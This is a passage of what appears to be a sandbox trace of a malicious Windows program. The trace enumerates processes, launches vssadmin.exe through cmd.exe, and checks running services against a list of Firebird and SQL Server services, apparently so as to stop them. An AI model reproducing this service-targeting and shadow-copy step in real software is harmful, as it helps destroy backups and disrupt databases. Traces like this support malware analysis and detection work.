dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0043.034] lstrlenW (lpString="pattern amateur.exe") returned 19 [0043.034] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0043.037] lstrlenW (lpString="referral.exe") returned 12 [0043.037] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0043.038] lstrlenW (lpString="copyingseems.exe") returned 16 [0043.038] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0043.038] lstrlenW (lpString="spin generally.exe") returned 18 [0043.038] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0043.039] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0043.039] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0043.040] lstrlenW (lpString="transmit.exe") returned 12 [0043.040] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0043.041] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0043.041] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0043.041] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0043.041] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0043.042] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0043.042] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0043.043] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0043.043] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0043.043] lstrlenW (lpString="delight.exe") returned 11 [0043.043] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0043.044] lstrlenW (lpString="within enquiry.exe") returned 18 [0043.044] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.045] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.045] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0043.045] lstrlenW (lpString="agent1c.exe") returned 11 [0043.046] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.046] lstrlenW (lpString="cmd.exe") returned 7 [0043.046] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.047] lstrlenW (lpString="conhost.exe") returned 11 [0043.047] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.048] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.048] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.048] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.048] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.049] lstrlenW (lpString="svchost.exe") returned 11 [0043.049] Process32NextW (in: hSnapshot=0x1a8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0043.050] CloseHandle (hObject=0x1a8) returned 1 [0043.050] Sleep (dwMilliseconds=0x1f4) [0043.676] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37208a8 [0043.685] EnumServicesStatusExW (in: hSCManager=0x37208a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0043.689] GetLastError () returned 0xea [0043.689] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0043.693] EnumServicesStatusExW (in: hSCManager=0x37208a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0043.708] CloseServiceHandle (hSCObject=0x37208a8) returned 1 [0043.708] lstrlenW (lpString="Appinfo") returned 7 [0043.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0043.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0043.708] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0043.708] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0043.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0043.708] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0043.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.708] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0043.708] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0043.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0043.709] lstrlenW (lpString="AudioSrv") returned 8 [0043.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0043.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0043.709] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0043.709] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0043.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0043.709] lstrlenW (lpString="BFE") returned 3 [0043.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0043.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0043.709] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0043.709] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0043.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0043.709] lstrlenW (lpString="CryptSvc") returned 8 [0043.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0043.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0043.709] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0043.709] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0043.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0043.709] lstrlenW (lpString="CscService") returned 10 [0043.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0043.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0043.709] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0043.709] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0043.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0043.709] lstrlenW (lpString="DcomLaunch") returned 10 [0043.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.709] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0043.710] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0043.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0043.710] lstrlenW (lpString="Dhcp") returned 4 [0043.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0043.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0043.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0043.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0043.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0043.710] lstrlenW (lpString="Dnscache") returned 8 [0043.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0043.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0043.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0043.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0043.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0043.710] lstrlenW (lpString="DPS") returned 3 [0043.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0043.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0043.710] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0043.710] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0043.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0043.710] lstrlenW (lpString="eventlog") returned 8 [0043.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0043.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0043.710] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0043.710] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0043.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0043.710] lstrlenW (lpString="EventSystem") returned 11 [0043.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0043.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0043.710] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0043.710] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0043.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0043.710] lstrlenW (lpString="gpsvc") returned 5 [0043.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0043.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0043.711] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0043.711] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0043.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0043.711] lstrlenW (lpString="iphlpsvc") returned 8 [0043.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.711] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0043.711] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0043.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0043.711] lstrlenW (lpString="LanmanServer") returned 12 [0043.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0043.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0043.711] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0043.711] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0043.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0043.711] lstrlenW (lpString="LanmanWorkstation") returned 17 [0043.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.711] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0043.711] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0043.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0043.711] lstrlenW (lpString="lmhosts") returned 7 [0043.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0043.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0043.711] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0043.711] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0043.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0043.711] lstrlenW (lpString="MMCSS") returned 5 [0043.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0043.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0043.711] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0043.711] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0043.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0043.712] lstrlenW (lpString="MpsSvc") returned 6 [0043.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0043.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0043.712] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0043.712] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0043.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0043.712] lstrlenW (lpString="Netman") returned 6 [0043.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0043.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0043.712] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0043.712] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0043.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0043.712] lstrlenW (lpString="netprofm") returned 8 [0043.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0043.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0043.712] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0043.712] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0043.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0043.712] lstrlenW (lpString="NlaSvc") returned 6 [0043.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0043.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0043.712] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0043.712] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0043.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0043.712] lstrlenW (lpString="nsi") returned 3 [0043.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0043.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0043.712] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0043.712] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0043.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0043.712] lstrlenW (lpString="PcaSvc") returned 6 [0043.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0043.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0043.712] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0043.713] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0043.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0043.713] lstrlenW (lpString="PlugPlay") returned 8 [0043.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0043.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0043.713] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0043.713] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0043.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0043.713] lstrlenW (lpString="Power") returned 5 [0043.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0043.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0043.713] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0043.713] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0043.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0043.713] lstrlenW (lpString="ProfSvc") returned 7 [0043.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0043.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0043.713] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0043.713] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0043.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0043.713] lstrlenW (lpString="RpcEptMapper") returned 12 [0043.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0043.713] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0043.713] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0043.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0043.713] lstrlenW (lpString="RpcSs") returned 5 [0043.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0043.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0043.713] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0043.713] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0043.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0043.713] lstrlenW (lpString="SamSs") returned 5 [0043.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0043.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0043.714] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0043.714] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0043.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0043.714] lstrlenW (lpString="Schedule") returned 8 [0043.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0043.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0043.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0043.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0043.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0043.714] lstrlenW (lpString="SENS") returned 4 [0043.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0043.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0043.714] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0043.714] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0043.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0043.714] lstrlenW (lpString="ShellHWDetection") returned 16 [0043.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0043.714] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0043.714] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0043.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0043.714] lstrlenW (lpString="Spooler") returned 7 [0043.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0043.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0043.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0043.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0043.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0043.714] lstrlenW (lpString="swprv") returned 5 [0043.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0043.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0043.714] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0043.714] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0043.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0043.715] lstrlenW (lpString="SysMain") returned 7 [0043.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0043.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0043.715] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0043.715] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0043.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0043.715] lstrlenW (lpString="Themes") returned 6 [0043.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0043.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0043.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0043.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0043.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0043.715] lstrlenW (lpString="TrkWks") returned 6 [0043.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0043.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0043.715] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0043.715] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0043.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0043.715] lstrlenW (lpString="UxSms") returned 5 [0043.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0043.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0043.715] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0043.715] 